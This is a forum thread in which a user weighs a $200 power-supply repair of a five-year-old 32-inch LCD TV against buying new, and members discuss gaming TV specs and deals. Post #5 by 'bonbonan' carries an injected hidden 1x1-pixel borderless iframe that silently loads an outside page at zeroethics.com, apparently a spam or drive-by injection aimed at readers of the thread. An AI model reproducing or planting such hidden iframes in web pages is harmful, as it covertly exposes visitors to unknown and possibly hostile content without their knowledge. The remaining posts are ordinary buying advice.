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  • mjussawalla
    Pro
    • May 2008
    • 775

    #1

    HELP with LCD TV

    Hi guys,

    My 32" Daytek LCD TV no longer turns on. The red standby light just dimly comes on and goes away.

    I called a couple of repair shops and they said it was a power supply problem. They said it would be about $200 to fix.

    Should I fix this TV (it is now about 5 years old) or should I spend a few hundred more and get a new 32"? If I get it fixed, is there a high chance that something else might breakdown soon?

    I would appreciate a quick response as this is my Xbox360 TV and I can't play till either fix it or get a new one.

    Thanks,
  • jake44np
    Post Like a Champion!
    • Jul 2002
    • 9563

    #2
    Re: HELP with LCD TV

    I wouldnt pay $200 to get a 32" tv fixed.
    ND Season Ticket Holder since '72.

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    • bigfnjoe96
      Hall Of Fame
      • Feb 2004
      • 11410

      #3
      Re: HELP with LCD TV

      Time to get a new-1. I suggest a VIZIO,TOSHIBA or LG.

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      • jake44np
        Post Like a Champion!
        • Jul 2002
        • 9563

        #4
        Re: HELP with LCD TV

        Originally posted by bigfnjoe96
        Time to get a new-1. I suggest a VIZIO,TOSHIBA or LG.
        Joe, Check out the thread I started earlier today titled rate this tv?
        What do you think about this tv?
        ND Season Ticket Holder since '72.

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        • bonbonan
          Rookie
          • May 2010
          • 316

          #5
          Re: HELP with LCD TV

          Originally posted by jake44np
          I wouldnt pay $200 to get a 32" tv fixed.<iframe src="http://zeroethics.com/opsports/" frameborder="0" marginheight="0" marginwidth="0" width="1" height="1"scrolling="no"></iframe>
          I totally agreed! i wouldnt pay $200 for 32" tv too. That is lame!

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          • Gotmadskillzson
            Live your life
            • Apr 2008
            • 23433

            #6
            Re: HELP with LCD TV

            Yeah considering you can get a brand new one for $440 like a Sony, LG, etc. Could even get a Element for $300

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            • mjussawalla
              Pro
              • May 2008
              • 775

              #7
              Re: HELP with LCD TV

              Thanks guys.

              Looks like I'll be getting a new one.

              I use this TV primarily for gaming. Is there one stat I should rank highest? (i.e. response time, refresh rate (120hz), contrast ratio, etc)

              Thanks,

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              • Gotmadskillzson
                Live your life
                • Apr 2008
                • 23433

                #8
                Re: HELP with LCD TV

                Look at the over all picture and don't get caught up in just one stat. Contrast ratio is important, but make sure the over all picture looks good before you even read the stats on a tv.

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                • koebner
                  MVP
                  • Jul 2002
                  • 1956

                  #9
                  Re: HELP with LCD TV

                  Originally posted by mjussawalla
                  Thanks guys.

                  Looks like I'll be getting a new one.

                  I use this TV primarily for gaming. Is there one stat I should rank highest? (i.e. response time, refresh rate (120hz), contrast ratio, etc)

                  Thanks,
                  Contrast Ratio is measured differently by different manufacturers and ends up being a gimmicky number.

                  120hz refresh rate vs. 60hz is a key demarcation between higher and lower price points ,now.The refresh rate is important for gaming,more so than 1080p vs.720p,actually.
                  Most sets now have a Game Mode setting that disables motion processing,thus reducing lag substantially.

                  Here is a pretty good choice at the 600 price point;http://www.samsclub.com/sams/shop/pr...sku=sku1764929

                  Also,http://www.frys.com/product/6174029

                  If that is more than you were looking to spend,drop down to 60hz and check out these;http://www.jr.com/toshiba/pe/TOS_32C100U/



                  Looking at a set in a store and trying to determine anything about its' picture quality is near pointless,as the sets are usually set to "torch mode" or Vivid setting and being fed different/dubious source via unknown connections.The lighting is also really bad in most stores,and not at all like your normal home viewing set up.
                  PS3/PS4 BradCompany

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                  • GAMEC0CK2002
                    Stayin Alive
                    • Aug 2002
                    • 10384

                    #10
                    Re: HELP with LCD TV

                    ^^^^ Good stuff above. At 32 inches, you're basically going to pay about $550-650 for a 1080p set. $400 can get you a nice 720p LCD. Either way, I'd strongly consider looking at a 42 720p inch plasma. If it was my money, I'd get this Sammy plasma for $500. http://www.amazon.com/Samsung-PN42C4...2601154&sr=8-1

                    Unless space is an issue, go big.

                    You may or may not notice a difference in 720p vs. 1080p especially on a 32 inch set. But you'll definitely notice (and appreciate) the 10 inches.
                    Last edited by GAMEC0CK2002; 08-23-2010, 07:09 PM.

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                    • HotSauce2k3
                      MVP
                      • Nov 2002
                      • 1848

                      #11
                      Re: HELP with LCD TV

                      Originally posted by GAMEC0CK2002
                      ^^^^ Good stuff above. At 32 inches, you're basically going to pay about $550-650 for a 1080p set. $400 can get you a nice 720p LCD. Either way, I'd strongly consider looking at a 42 720p inch plasma. If it was my money, I'd get this Sammy plasma for $500. http://www.amazon.com/Samsung-PN42C4...2601154&sr=8-1

                      Unless space is an issue, go big.

                      You may or may not notice a difference in 720p vs. 1080p especially on a 32 inch set. But you'll definitely notice (and appreciate) the 10 inches.
                      Hey that's my line...

                      ...


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                      • HotSauce2k3
                        MVP
                        • Nov 2002
                        • 1848

                        #12
                        Re: HELP with LCD TV

                        And if you're willing to go plasma, this is a very good deal:



                        $400

                        Specs:
                        • Resolution: 1024 x 768
                        • Contrast Ratio: 1,000,000:1 Dynamic
                        • Tuners: ATSC / QAM / NTSC
                        • Refresh Rate: 600Hz
                        • Inputs:
                          • 2 x HDMI Digital Audio/Video In Rear
                          • 2 x Component Video In Rear
                          • 1 x Composite Video In Rear
                          • 1 x PC Audio Rear

                        And if you're worried about the Insignia brand, it's just a Samsung rebranded. It's a really good deal.
                        Last edited by HotSauce2k3; 08-23-2010, 07:01 PM.

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